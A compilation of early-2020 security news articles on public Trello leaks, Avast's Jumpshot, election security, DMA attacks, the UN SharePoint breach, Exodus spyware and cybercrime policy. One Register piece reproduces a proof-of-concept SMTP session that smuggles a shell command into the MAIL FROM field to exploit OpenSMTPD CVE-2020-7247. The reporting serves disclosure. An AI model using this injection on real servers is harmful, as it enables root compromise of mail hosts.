STE WILLIAMS

Hands up who’s used the increasingly popular online collaboration platform Trello?

Trello is great for organising to-do lists and for coordinating team tasks.

But it has its downsides too. While the default for Trello boards is set to ‘private’, many users set them to ‘public’ which means that anyone can see what’s posted there.

Not only that, search engines such as Google index public Trello boards, making it simple for anyone to uncover the boards’ contents using a specialised type of search called a ‘dork’.

And it’s surprising how much sensitive data there is.

Our global cybersecurity operations director at Sophos, Craig Jones, has been keeping an eye on this for a couple of years, first tweeting about it in 2018.

One of the worst Trello boards I came across, a HR onboarding Trello board, it’s been reported and removed now. It… twitter.com/i/web/status/9…

—
Craig Jones (@albanwr) April 17, 2018

When news broke last week about office space company Regus exposing the performance ratings of hundreds of its staff via a public Trello board, Craig thought he’d take another look at what’s out there.

An enthusiastic Trello user himself, Craig quickly found a trove of highly sensitive data sprayed out by sizeable numbers of public Trello boards.

He found a board from a housing company detailing the fixes needed in each accommodation, including broken door locks:

Craig also discovered a staff board for what appears to be some sort of facilities company that listed names, emails, dates of birth, ID numbers, bank account information, and more:

And then there’s an HR board that details a specific job offer to someone, including their salary, bonus and contractual obligations:

There’s more.

He found a board relating to an Australian pub which included details of customer fraud, bucketloads of gmail and social media passwords, and API keys, passwords and credentials belonging to a global IT household name.

Craig has contacted the companies where he can, to inform them their data is publicly accessible. Many have taken down the boards already.

Why do people set sensitive boards to public?

One would assume, in most cases, this is not deliberate. The design of Trello has changed over the years so it might be related in part to a past issue. It’s also possible that some are made public by one individual for a legitimate reason, the security implications of which are lost on other users of the same board.

Some boards are set up, made public, and eventually forgotten (although not by Google). It’s the latest version of the whole shadow IT problem where people use tools they don’t fully understand how to use securely.

Whose fault is it?

Sure, users need to bear some responsibility over keeping their data private. But Craig also believes search engines aren’t helping here.

For me, any benefit in indexing Trello boards is far outweighed by the risk of making it possible to access inadvertently exposed data. While we should all take responsibility for keeping our Trello boards private, I’d love to see Google and others stop the indexing of them in the first place.

What to do

If you are a Trello user, go and check the status of your boards and set anything with sensitive data in it to “private”.

If you know of any exposed data – perhaps data relating to you or a company you’ve worked at – there are two routes to getting it taken down.

One is to contact the admin who set up the board. In many cases, that won’t be possible, so a second option is to contact Trello, asking for the board to be made private.

But even after doing that, content remains cached on search engines for a period of time which is why it’s also necessary to ask Google to remove the content from search, or send a cache flushing request (which will cause Google to re-index it, hopefully receiving a 404 from Trello).

---

Latest Naked Security podcast

LISTEN NOW

Click-and-drag on the soundwaves below to skip to any point in the podcast.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/xSnZVFqX8_4/

This week we discuss 70,000 images being stolen from Tinder, the weleakinfo.com FBI bust and how Sonos annoyed its longstanding customers.

Host Anna Brading is joined by Sophos experts Mark Stockley, Greg Iddon and producer Alice Duckett.

Listen now!

LISTEN NOW

Click-and-drag on the soundwaves below to skip to any point in the podcast.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/egQbHH_Ja98/

Avast will pull the plug on Jumpshot, its controversial data analytics business, after it was revealed the company was harvesting its users’ data.

The Brit antivirus firm ran into trouble last month when a security researcher, Wladimir Palant, found that the company’s Firefox browser extensions were collecting customers’ browsing data, including URLs of sites they had visited, and per-device unique IDs, and selling it, apparently deanonymised, to customers such as Revlon, Tripadvisor and Intel.

The extensions were booted out of the Mozilla and Google web stores following the story. In response, Avast said it had stopped gathering people’s data “for any other purpose than the core security engine, including sharing with Jumpshot”.

But a PCMag investigation publicised earlier this week found that Avast can still collect users’ browser history through its main antivirus application, or through AVG antivirus, which it also owns. The data is harvested through the software’s Web Shield component, which scans URLs on your browser to detect malicious or dodgy websites, it claimed. Jumpshot denied the allegations.

Avast announced the closure, which it termed a “winding down” in a press release this morning, saying that it would “terminate its provision of data” to Jumpshot immediately and eventually close the business. It added: “Jumpshot may not use any existing data provided by Avast and no further data will be provided by Avast.”

In a linked blog post, the company’s newish chief exec, Ondrej Vlcek, said Jumpshot had acted “fully within legal bounds”. The decision to close the company was made because it did not fit with its privacy policies for 2020 and beyond, he said.

“Protecting people is Avast’s top priority and must be embedded in everything we do in our business and in our products. Anything to the contrary is unacceptable,” the blog post read.

He added that the closure would “impact” hundreds of employees across the company’s five global offices. The company intends to continue paying its suppliers “in full as necessary” during the closedown.

The closure will not affect Avast’s financial results, the company said in a trading update. It forecasts mid-single-digit growth in underlying revenue for the current year, excluding Jumpshot. ®

Sponsored:
Detecting cyber attacks as a small to medium business

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/01/30/avast_to_close_jumpshot/

Too many states and municipalities still rely on aging systems; it’s time they upped their game and treated election technology like they would any other security project.

The old curse, “May you live in interesting times,” seems appropriate these days, as we look to navigate the challenges of securing the election systems in the US. 

In December 2019, the federal government allocated $425 million for states to upgrade their election security. This is the second round of funding to protect voting systems; the first, in 2018, totaled $380 million. Roughly 90% of that money was allocated for new voting machines and other cybersecurity projects for the elections. However, many feel that both allocations are not enough to properly invest in election security, including hiring cybersecurity experts, conducting post-election audits, and upgrading registration databases and voting machines. 

This is why we must focus on the most effective areas to allocate the recent funding to improve the security of our elections.

How do we start?
The US is known as a technologically advanced country, and there are many options to take on this journey. Yet, the reality is that many states and municipalities still rely on aging systems and infrastructure, which are often complex and decentralized. This fragmentation problem alone is enough to give us pause. Combine that with limited resources and a growing gap in cybersecurity talent, and we have the potential for a runaway train.

First and foremost, this problem needs to be looked at just as a typical organization would with a security budget. An effort of this magnitude needs impeccable planning and execution. Here are five tips to get that process started in the right way.

• Hire a CISO specifically for election security projects. Just like any other organization would hire a security executive to oversee security efforts, federal and state governments must do the same. While we have heads of security for states and sometimes for municipalities, there is so much decentralization, it’s difficult to get all security experts on the same page and agree to what is necessary. This also helps the common problem of lack of transparency between states and the federal government.
• Evaluate the current environment and build a custom election security model. Everything from the network and firewall level, down to the application and data layer need to be evaluated thoroughly and made sure they are fully deployed, operational, and effective. We can often learn from other organizations, from different industries, that have been successful in implementing a strong, transparent, and effective security model for their company. It would be helpful to seek the advice and council of those leaders who have attained that level, and who can also help you see any blind spots. 
• Protect the applications in the actual voting systems. We are often quick to slap on perimeter security in hopes that these measures will take care of a majority of potential incidents. But this way of thinking is limited. If there is one thing that the past 15 years has taught us, is that the perimeter is breaking down, with many experts maintaining that it’s already effectively dissolved. This gave rise to frameworks such as zero-trust security, that given the use of cloud technologies and the collaboration economy, plainly states that all aspects of technology and security must defend itself.

  We can’t rely solely on firewall and network security anymore. We must protect the applications and the data itself. This includes implementing extensive application testing protocols — such as Static Application Security Testing (SAST), Dynamic Application Security Testing (DAST), and Software Composition Analysis (SCA) — throughout the software development lifecycle, to ensure that your software code isn’t exploited and used to bring down critical infrastructure and other election system technologies. Or worse yet, that your election software isn’t hacked, and the actual votes and election results altered thereby hacking our democracy.

• Understand the risks of using third-party development and security companies.
  Outsourcing development and security projects can introduce risks that any organization must consider before proceeding with this model. These potential hazards can negatively impact the business’s bottom line and bring critical projects to a grinding halt before they can even be launched. Do these third-party vendors deeply understand the problem and the business outcomes you need? It’s also important to know their due diligence and software quality practices when it comes to the development and security of the applications that power election systems.

• Tap threat research, SOCs, and incident response. It’s well understood that you can’t protect what you can’t see. Make sure there is a solid operations center on this effort at all times, and that you’re learning from the data streams it’s uncovering. This includes research about particular threats, that can feed into an overall incident response plan in the event that something happens. SIEMs and security management platforms can help in this effort.

The Bottom Line
This is not a short-term journey, and it’s certainly not an easy one, but it’s possible to get there if we do it right. It takes the involvement and collaboration between states, municipalities and the federal government, as well as security companies that can help provide guidance, and third parties that can help in development and implementation efforts. Let’s not waste any more time and money. Let’s work together and spend this latest allocation in the best and smartest ways possible. Let’s work together to keep our democracy hack-proof.

Related Content:

• Iranian Cyberattack on US Presidential Campaign Could Be a Sign of Things to Come
• Election Security Isn’t as Bad as People Think
• DEF CON Invites Kids to Crack Campaign Finance Portals
• The Votes Are In: Election Security Matters

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Top story: “7 Steps to IoT Security in 2020.”

Craig Hinkley joined WhiteHat Security as CEO in early 2015, bringing more than 20 years of executive leadership in the technology sector to this role. Craig is driving a customer-centric focus throughout the company and has broadened WhiteHat’s global brand and visibility … View Full Bio

Article source: https://www.darkreading.com/risk/election-security-2020-how-we-should-allocate-$425m-in-funding-/a/d-id/1336885?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Most laptops, workstations, and servers are still vulnerable to physical attacks via direct memory access, despite mitigations often being available, report says.

Hardware makers have lagged behind in protecting even the latest systems from attacks through their ports, leaving users’ and companies’ systems open to exploit by anyone who can snag some alone time with the targeted system, security firm Eclypsium stated in a report published on January 30.

The attacks exploit the direct memory access, or DMA, feature of some computers and servers which allow peripherals to directly access the system’s memory. In a recent test of two modern laptops, security researchers at the firm found that they could easily compromise the systems — one through a port and the other through a supply chain–type attack by opening the case — even though firmware makers have solutions available to mitigate the DMA security issues, says Jesse Michael, principal researcher with Eclypsium.

“This is something has been traditionally difficult for people to fix,” he says. “Because even though there are security features and capabilities and protections that are being put into silicon and the hardware by Intel and the chipset vendors, … it takes a while for the different vendors to write code that enables and actually configures these hardware protections to secure the system before it gets into customer hands.”

Not a New Issue
The attacks are not new. In 2016, Ulf Frisk, a security researcher based in Sweden, published PCILeech, a program that compromises systems through ports to give direct high-speed access to a system’s memory. Such ports are often used to drive an external monitor, allow a graphics upgrade, or expand memory. A December 2016 video of the attack shows him recovering the FileVault password of a MacBook Air just by connecting his attack system through the Thunderbolt port.

Since 2017, the makers of laptops, workstations, and servers have had the tools to harden their devices against such attacks, but many have not taken the steps to deliver a secure system to end users. Eclypsium’s researchers, for example, bought a new Dell XPS laptop — a model introduced in October 2019 — and found that it had PCI-over-Thunderbolt enabled by default. They easily exploited the issue, Michael says.

“While device vendors, chip vendors, and operating system vendors have all developed new controls to defend against these threats, our research shows that many devices with built-in hardware protections continue to be vulnerable,” Eclypsium stated in the report.

In December 2019, Dell issued an advisory and mitigation steps for the issue. Other laptop lines are not affected, the company stated.

Giving anyone physical access to a system poses a security risk. Hardening systems against the autorun setting for devices plugged into the USB port, for example, took years and significant hacks at the US Department of Defense to spur action. Leave your laptop unattended in a cafe and someone could plug in a malicious device that compromises the system in minutes.

Yet market pressures are pushing more vendors to adopt DMA to give workers and consumers the ability to plug in an external monitor or the ability to significantly boost graphics power.

“People think of the boundaries of the laptop as the security perimeter, but if you have a modified mouse or keyboard, you are potentially owned,” says Eclypsium’s Michael. “We want things to go faster and faster, so we are adding capabilities to these externals ports. Now we are bringing all PCI capabilities through this external port, and there are some interesting security ramifications [extending features] outside the case.”

The research also demonstrates that such attacks could be a supply-chain danger for companies, if attackers could get several minutes of hands-on access to a system to implant malicious hardware. In their second test, the researchers replaced an HP laptop’s wireless card with a programmable development platform, which could modify system RAM during boot, gaining control of the device, Eclypsium stated.

HP issued an updated version of the BIOS to fix the issue last week.

While these attacks are not new, their continued existence underscore that companies need to pay more attention to the firmware of devices they acquire, says Eclypsium. In 2016, Frisk published a tool for exploiting DMA weaknesses in systems. Known as PCILeech, the program allows attackers to target Windows, Linux, and Mac systems.

“PCILeech is capable of inserting a wide range of kernel implants into the targeted kernels — allowing for easy access to live RAM and the file system via a ‘mounted drive,'” Frisk wrote. “It is also possible to remove the logon password requirement, loading unsigned drivers, executing code and spawn system shells.”

Since then, chipset and firmware vendors have produced solutions to the issues, but often even the latest systems do not have those mitigations turned on, Eclypsium’s Michael says.

“We know how to solve it; it is just isn’t in everybody’s hands yet,” he says. “And some vendors, like [the makers of] a gaming laptop, they might not ever put this kind of solution in.”

Related Content:

• From ‘O.MG’ to NSA, What Hardware Implants Mean for Security
• New Cold Boot Attack Gives Hackers the Keys to PCs, Macs
• New Attack Vector Shows Dangers of S3 Sleep Mode
• USB Drives Remain Critical Cyberthreat
• Apple Mac Models Vulnerable to Targeted Attacks

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “7 Steps to IoT Security in 2020.”

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/enterprise-hardware-still-vulnerable-to-memory-lane-attacks/d/d-id/1336921?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

A remote code execution flaw enabled a breach of UN offices in Geneva and Vienna, as well as the Office of the High Commissioner for Human Rights.

A cyberattack targeting United Nations offices in July 2019 reportedly stemmed from Microsoft SharePoint vulnerability CVE-2019-0604, which was patched early last year and has been under active attack since then. A senior UN IT official estimates some 400GB of data was downloaded.

News of the breach comes from a confidential document from the UN Office of Information and Technology. The file was leaked to The New Humanitarian and seen by the AP, which reports 42 servers were compromised and another 25 are considered suspicious. The majority of these servers are at the UN offices in Geneva and Vienna. Attackers were also able to access Active Directories, likely obtaining human resources, insurance systems, databases, and network data.

It’s so far unclear exactly which documents and data the attackers stole; however, those who viewed the report imply internal documents, emails, databases, and commercial information may have been accessed. The sensitive nature of information handled by these offices could have major consequences for UN staff and the many people it works with around the world.

Reports indicate the UN hid the incident, which reportedly began in July 2019 and was noticed a month later. Employees were alerted to change their passwords but not notified of a breach, even though staff records, health insurance, and commercial contract data were compromised in the incident. Attackers were able to infiltrate pieces of IT infrastructure, including system controls, user and password management tools, and firewalls.

The attackers reportedly gained access via CVE-2019-0604, a known remote code execution vulnerability in Microsoft SharePoint that was disclosed in February 2019. Since a patch was released, security researchers have seen the bug exploited in active attacks. In May 2019, both the Saudi Arabia National Cyber Security Center and Canadian Cyber Security Centre reported attackers were using the China Chopper web shell to gain initial access and exploit this flaw.

This vulnerability gave intruders the access they needed to move throughout UN networks. So far, the attackers have not been identified, though it’s believed they are sophisticated threat actors.

Read more details here. 

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “7 Steps to IoT Security in 2020.”

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/threat-intelligence/united-nations-data-breach-started-with-microsoft-sharepoint-bug/d/d-id/1336926?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

In March 2019, researchers with a group called Security Without Borders – a non-profit that often investigates threats against dissidents and human rights defenders – identified more than 20 government spyware apps squatting in plain sight, pretending to be harmless, vanilla apps on Google’s Play store.

Those apps – which were just a decoy through which government spyware called Exodus was installed on targets’ phones – were anything but harmless. In a two-stage process, they snorted up lists of installed apps, browsing history, contact lists from numerous apps, text messages – including encrypted texts – location data, and app and Wi-Fi passwords. The malware could also activate cameras and microphones to capture both audio and video, as well as take screenshots of apps as they were being used.

That spyware came from an Italian surveillance company called eSurv, and though it was good at hacking people’s phones, it stunk at securing its own data. The spyware opened up a remote command shell on infected phones, but it failed to use any sort of encryption or authentication, so that anyone on the same Wi-Fi network as an infected device could wander in and hack it.

But it was that shoddy security that’s led authorities to a stunning discovery: as Bloomberg reported earlier this month, eSurv employees have allegedly spied on unwitting, innocent Italian citizens with the powerful surveillance technology.

They allegedly did it with a lot of brass: according to court documents seen by Bloomberg: eSurv employees would play aloud secretly recorded phone conversations in the office. And while it was selling its spyware to law enforcement agencies, it also allegedly struck a deal with a company – ‘Ndrangheta – that’s said to be linked to the Mafia.

Unearthing the snooping apps

The man behind Exodus is Italian developer Diego Fasano. After successfully creating an app for doctors to view medical records, a friend told him that he should get into the surveillance business, where investigators have been clamoring for help in penetrating communications encrypted by messaging apps such as WhatsApp and Signal. In 2014, he founded eSurv, which sells surveillance technology to police and intelligence agencies.

How it worked: with the help of Italy’s telecoms, the company would dupe people into downloading what appeared to be an innocuous app that would ostensibly fix network errors on their phone. Fasano said that police, in cooperation with mobile phone networks, would shut down a targeted person’s data service. Next, they’d send instructions to use Wi-Fi to download an app to restore service. The app was designed to look like it was associated with telecom providers, with names such as “Operator Italia.”

The real purpose: to give law enforcement access to a device’s microphone, camera, stored files and encrypted messages. Fasano sold Exodus to prosecutors’ offices across the country, including to the country’s foreign intelligence agency, L’Agenzia Informazioni e Sicurezza Esterna.

A security blunder led to Exodus’s undoing, however. According to authorities, in 2018, a prosecutor’s office in the city of Benevento was using Exodus to hack the phones of suspects in an investigation. In October, a technician noticed that the network connection kept dropping out.

After doing some sleuthing, the tech found that Exodus wasn’t working off a secure internal server accessible only to the Benevento prosecutor’s office, as it was supposed to do. Rather, it was connecting to a server accessible to anyone on the internet, protected only by a username and password.

That meant that data covertly collected by Italian prosecutors from suspects’ phones in the course of some of the country’s most sensitive investigations – of Mafia cases, terrorist cases, and corruption cases – were at risk of interception by hackers. That included thousands of photos, recordings of conversations, private messages and emails, videos, and other files gathered from hacked phones and computers – a total of about 80 terabytes of data, or roughly 40,000 hours of HD video, stored in unencrypted form on what turned out to be an Amazon Web Services server in Oregon.

Authorities don’t know if that server was ever hacked.

Prosecutors filed criminal charges against eSurv for unlawfully collecting and storing private communications, transferring them overseas, and failing to keep secure “sensitive personal data of a judicial nature.”

Naples prosecutors expect the investigation to be completed later this year. Meanwhile, Fasano and another eSurv executive, Salvatore Ansani, have been charged with fraud, unauthorized access to a computer system, illicit interception and illicit data processing. Kept under house arrest for three months, they’ve been released and are now awaiting the next stage of their legal proceedings, which will likely result in a trial.

Further investigation found that a subset of eSurv’s 20 employees – devoted to working on Exodus and led by Ansani, they called themselves The Black Team – used the spyware to target law-abiding Italian citizens who were never named as suspects in investigations. Nonetheless, those citizens’ phones were bugged, and their private conversations were recorded, for reasons that authorities say are still unknown.

According to police documents, the Black Team spied on more than 230 people whom police weren’t authorized to surveil. Some of those people were referred to in eSurv’s internal files as “The Volunteers” – in other words, they may have been unwitting guinea pigs.

Investigators are still combing through the vast amount of data they seized from eSurv as they try to figure out the purpose for the illegal data collection. Was it intended for blackmail? For fun? For spying? For illegal surveillance on behalf of the Mafia?

At this point, one prosecutor – Eugenio Facciolla, who’s at the center of a corruption scandal – has been charged with forging documents in an effort to obstruct or mislead a police investigation into an ‘Ndrangheta-led illegal logging operation that involved chopping down thousands of trees in some of Italy’s national parks.

In November, the agency that handles prosecutor appointments said that it was removing Facciolla from his office in Castrovillari, on the grounds that he had “abused his functions.” Facciolla is appealing the decision. Yes, he says, he supplied Exodus to other companies, but, according to his lawyer, Vincenzo Ioppoli, the spyware is “like a gun.”

Once you have sold it, you don’t know how it will be used.

---

Latest Naked Security podcast

LISTEN NOW

Click-and-drag on the soundwaves below to skip to any point in the podcast.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/08noJbBMayg/

Enigma A plague of ignorance and misplaced priorities in government and law enforcement, from neighborhood cops all the way up to international bodies, is allowing cyber-crime to run rampant.

So says Mieke Eoyang, long-time US government policy adviser and veep of the national security program at Washington DC think tank Third Way. Speaking at the 2020 Enigma conference in San Francisco on Wednesday, Eoyang made the case for allocating time and money to finding and snaring internet crooks, hauling them into court, and shutting down this criminality. In other words, proactively tackling criminals, rather than relying on fending off attacks.

After citing figures from Uncle Sam that show only three in 1,000 cyber-crimes are actually prosecuted – the actual ratio could be closer to three in 100,000 as the FBI tends to underestimate the extent of cyber-crime, she explained – Eoyang said police and agents are not told to go after online fraudsters nor given the training and resources to do so anyway.

“We continue to blame users for not avoiding clicking on every phishing link,” said Eoyang, a former staff director for the US House of Representatives Permanent Select Committee on Intelligence.

“When a breach becomes public the response all too often is to blame the victim company. We are focusing on defending systems over identifying, pursuing, and bringing to justice the person behind the cyber-crime.”

The problem, Eoyang argued, is not a lack of people-power or money, but rather a set of misplaced priorities and ignorance at the city, county and state level. Officers lack the basic skills to pursue online crimes, instead handing cases off to overworked and undermanned specialized cybercrime units.

As a result, in many cases, cybercrime falls through the cracks, considered too big for your neighborhood plod and not significant enough to catch the attention of elite federal or national cyber-crime investigation teams.

One easy solution would be to expand the skill set of rank-and-file officers to include basic IT and data security techniques, she opined.

To catch a thief, go to Google with a geofence warrant – and it will give you all the details

READ MORE

“This is an overlooked area that is very specialized in the FBI and not something they all know about,” Eoyang said. “We need to rebalance resource investment in this area, we need to build cyber investigation-capable law enforcement.”

There is also the matter of international cooperation, and in that area authorities need to be a bit more creative.

For example, Eoyang pointed out that even though an online criminal may be shielded from extradition by operating out of somewhere like Russia, they almost inevitably expose themselves to arrest when they opt to spend their ill-gotten gains in Malta, Israel, and high-end destinations. To that end, building diplomatic ties and getting cooperation from law enforcement in other countries will be critical.

One area where Eoyang doesn’t see the need for the government to step up its efforts, however, is busting encryption. Drawing applause from the crowd of security professionals in attendance, the former congressional staffer declared that Feds-only backdoors are simply not the way to go.

“This [strong end-to-end encryption] is not the only thing that stands in the way of their ability to investigate,” she said. “They don’t even know how to write a proper request to the tech companies for the information they already can access.” ®

Sponsored:
Detecting cyber attacks as a small to medium business

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/01/30/cops_crime_failure/

Code dive The OpenBSD project’s OpenSMTPD can be potentially hijacked by a maliciously crafted incoming email.

Infosec biz Qualys discovered and this week disclosed CVE-2020-7247, a root privilege-escalation and remote code execution flaw in OpenSMTPD. It can be exploited locally by a normal user to execute shell commands as root, if using the daemon’s default configuration, or locally and remotely if the daemon is using its “uncommented” default configuration, in which it listens on all interfaces and accepts external mail. Getting root access means it’s game over: the machine is now yours.

This bug is bad news for anyone running a public-facing, external-mail-accepting OpenSMTPD deployment. Check for security updates to close the hole, apply this patch, or disable the daemon. The version shipping with OpenBSD 6.6, the latest available, and Debian testing, aka Bullseye, are vulnerable to attack; other releases may be as well. The bug dates back to May 2018.

How it went wrong

After it receives an email, OpenSMTPD invokes a mail delivery agent to place the incoming message in the recipient’s inbox on the system. The delivery agent is invoked by OpenSMTPD executing a shell command, which includes the sender’s address as a command-line parameter. The sender’s address was supplied by whichever email client earlier connected to OpenSMTPD to send the message.

Passing this address straight to the shell as a parameter is dangerous because hackers can exploit this to inject extra commands to be executed. To avoid this, OpenSMTPD has a string called MAILADDR_ALLOWED that defines the non-alpha-numeric characters allowed in a valid address. In addition, the string MAILADDR_ESCAPE contains characters that are converted to a colon character to neutralize any threats. So, an address is valid if it contains only alpha-numeric characters, full-stops, and anything else in MAILADDR_ALLOWED. And anything that’s also in MAILADDR_ESCAPE gets converted to a colon. Thus whatever sender address is supplied by an email client, it can’t smuggle in extra commands.

Unfortunately, OpenSMTPD’s sender address validation code, smtp_mailaddr(), accidentally jumps the gun and approves dangerous sender addresses that can inject arbitrary commands into delivery agent invocations. An email address has two parts, the local part and the domain part. For [email protected], corrections is the local part, and theregister.co.uk is the domain part. If the sender’s address has an invalid local part, and an empty domain part, smtp_mailaddr() tries to helpfully add a default domain to the address, and then just OKs the string for use on the command line, ignoring the fact the local part is invalid.

Thus if you place invalid characters into the local part that inject commands into the command line that’s supposed to invoke the delivery agent, it’ll sail through when it’s not supposed to.

Here’s the C code at the heart of the security blunder – smtp_mailaddr() should return the value 1 for a valid address and 0 for an invalid address when checking the address in the string pointed to by maddr:

2189 static int
2190 smtp_mailaddr(struct mailaddr *maddr, char *line, int mailfrom, char **args,
2191     const char *domain)
2192 {
....
2218         if (!valid_localpart(maddr-user) ||
2219             !valid_domainpart(maddr-domain)) {
....
2229                 if (maddr-domain[0] == '') {
2230                         (void)strlcpy(maddr-domain, domain,
2231                             sizeof(maddr-domain));
2232                         return (1);
2233                 }
2234                 return (0);
2235         }
2236
2237         return (1);
2238 }

“If the local part of an address is invalid (line 2218) and if its domain name is empty (line 2229), then smtp_mailaddr() adds the default domain automatically (line 2230) and returns 1 (line 2232), although it should return 0 because the local part of the address is invalid (for example, because it contains invalid characters),” the Qualys team explained in its summary.

“As a result, an attacker can pass dangerous characters that are not in MAILADDR_ALLOWED and not in MAILADDR_ESCAPE (‘;’ and ‘ ‘ in particular) to the shell that executes the [mail delivery agent] command.”

Exploitation is trivial

To exploit this on your own deployment, connect to your local OpenSMTPD server using Netcat. The following interaction, provided by Qualys as a proof of concept, is just what your email client would go through with the server behind the scenes, though in this case, we’ll abuse the sender address field. Run nNetcat with:

$ nc 127.0.0.1 25

And the daemon will introduce itself:

220 obsd66.example.org ESMTP OpenSMTPD

Reply by saying hello to the software:

HELO professor.falken

It acknowledges you:

250 obsd66.example.org Hello professor.falken [127.0.0.1], pleased to meet you

Here comes the magic. Inject the command sleep 66 to make the software pause for 66 seconds, using ; to escape from the delivery agent invocation:

MAIL FROM:;sleep 66;

And that’s it. The agent invocation command passed to the shell by OpenSMTPD will look something like /usr/libexec/mail.local -f ;sleep 66; followed by the rest of the command, which will probably fail as it’s malformed having been cut in half by the ;...; injection sequence.

All we care about is the first semicolon ending the mail.local invocation prematurely so that our slipped-in sleep 66 runs, and the second semicolon walling off the rest of the invocation command from affecting our injected command.

With that sent, the server replies:

250 2.0.0 Ok

Great, it’s accepted. Play out the rest of the message delivery, such as setting the recipient and message contents:

RCPT TO:root
250 2.1.5 Destination address valid: Recipient ok
DATA
354 Enter mail, end with "." on a line by itself

How about a nice game of chess?
.
250 2.0.0 e6330998 Message accepted for delivery
QUIT
221 2.0.0 Bye

And with that, the agent command will be run, including our injected sleep.

Interestingly, Qualys said the vulnerability was thought to be much more limited when it was first found: achieving non-trivial command execution is difficult due to various restrictions in place. However, the team were inspired by the 1988 Morris worm’s abuse of the DEBUG vulnerability in Sendmail to achieve full remote-code execution.

“Exploitation of the vulnerability had some limitations in terms of local part length (max 64 characters is allowed) and characters to be escaped (“$”, “|”),” said Animesh Jain, Qualys vulnerability signatures product manager.

“Qualys researchers were able to overcome these limitations using a technique from the Morris Worm (one of the first computer worms distributed via the Internet, and the first to gain significant mainstream media attention) by executing the body of the mail as a shell script in Sendmail.”

Admins are advised to update their software and installations as soon as possible. ®

Sponsored:
Detecting cyber attacks as a small to medium business

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/01/30/openbsd_mail_bug/

The United Nations’ European headquarters in Geneva and Vienna were hacked last summer, putting thousands of staff records at miscreants’ fingertips. Incredibly, the organization decided to cover it up without informing those affected nor the public.

That is the extraordinary claim of The New Humanitarian, which until a few years ago was an official UN publication covering humanitarian crises. Today, it said the UN has confirmed both the hack and the decision not to divulge any details.

Dozens of UN servers were impacted in an attack that began in mid-July 2019 but was only noticed one month later, according to a confidential report dated September 20. The publication gained access to that report, which outlines a series of security holes discovered by an external forensic company as well as internal efforts to contain the hack.

“We are working under the assumption that the entire domain is compromised,” an alert sent to internal sysadmins on August 30 noted. “The attacker doesn’t show signs of activity so far, we assume they established their position and are dormant.”

A senior IT official dubbed the attack a “major meltdown,” in which personnel records – as well as contract data covering thousands of individuals and organizations – was accessed. The hackers were able to get into user-management systems and past firewalls; eventually compromising over 40 servers, with the vast majority at the European headquarters in Geneva.

But despite the size and extent of the hack, the UN decided to keep it secret. Only IT teams and the heads of the stations in question were informed.

“The attack resulted in a compromise of core infrastructure components,” a UN spokesperson told The New Humanitarian. “As the exact nature and scope of the incident could not be determined, [the UN] decided not to publicly disclose the breach.”

Just a quick password change, nothing to worry about

Employees whose data was within reach of the hackers were told only that they needed to change their password and were not informed that their personal details had been compromised. That decision not to disclose any details stems from a “cover-up culture” the anonymous IT official who leaked the internal report told the publication.

The report notes it has been unable to calculate the extent of damage but one techie – it’s not clear it is the same one that leaked the report – estimated that 400GB had been pulled from United Nations servers.

Most worrying is the fact the UN Office of the High Commissioner for Human Rights (OHCHR) was one of those compromised. The OHCHR deals with highly sensitive information from people who put their lives at risk to uncover human rights abuses.

Making matters worse, IT specialists had warned the UN for years that it was at risk from hacking. An audit in 2012 identified an “unacceptable level of risk,” and resulted in a restructure that consolidated servers, websites, and typical services like email, and then outsourced them to commercial providers at a cost of $1.7bn.

But internal warnings about lax security continued, and an official audit in 2018 was full of red flags. “The performance management framework had not been implemented,” it stated, adding that there were “policy gaps in areas of emerging concern, such as the outsourcing of ICT services, end-user device usage, information-sharing, open data and the reuse and safe disposal of decommissioned ICT equipment.”

There were lengthy delays in security projects, and, internally, departments were ignoring compliance efforts. The audit “noted with concern” that 28 of the 37 internal groups hadn’t responded at all and that over the nearly 1,500 websites and web apps identified only a single one had carried out a security assessment.

The audit also found that less than half of the 38,105 staff had done a compulsory course in basic IT security that had been designed to help reduce overall security risks. In short, this was an accident waiting to happen, especially given the UN’s high-profile status.

SharePoint shafting

As to the miscreants’ entry point, it was a known flaw in Microsoft SharePoint (CVE-2019-0604) for which a software patch had been available for months yet the UN had failed to apply it.

The hole can be exploited by a remote attacker to bypass logins and issue system-level commands – in other words, a big problem from a security standpoint. The hackers broke into a vulnerable SharePoint deployment in Vienna and then, with admin access, moved within the organization’s networks to access the Geneva headquarters and then the OHCHR.

Who honestly has a crown prince in their threat model? UN report officially fingers Saudi royal as Bezos hacker

READ MORE

One person who was shown the report – cybersecurity researcher Kevin Beaumont – said that the intrusion “has the hallmarks of a sophisticated threat actor.”

With North Korea, China, Iran, and others, investing heavily in cyber-attack capabilities, as well as private criminal gangs, it could be anyone, and the report does not find any fingerprints that point to a specific group. That may be a result of the UN trying to keep the entire thing under wraps.

It could also, of course, be the US, which would legally be allowed to target the UN in Geneva, rather than UN headquarters in New York because it is outside North America. The United States, like other countries, has a long history of trying to find out what is going on behind closed doors at the United Nations.

Either way, it was a huge security cock-up on the UN’s part and its decision not to disclose it to anyone, even those impacted, flies in the face of modern best practice. ®

Sponsored:
Detecting cyber attacks as a small to medium business

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/01/29/un_covered_up_hack/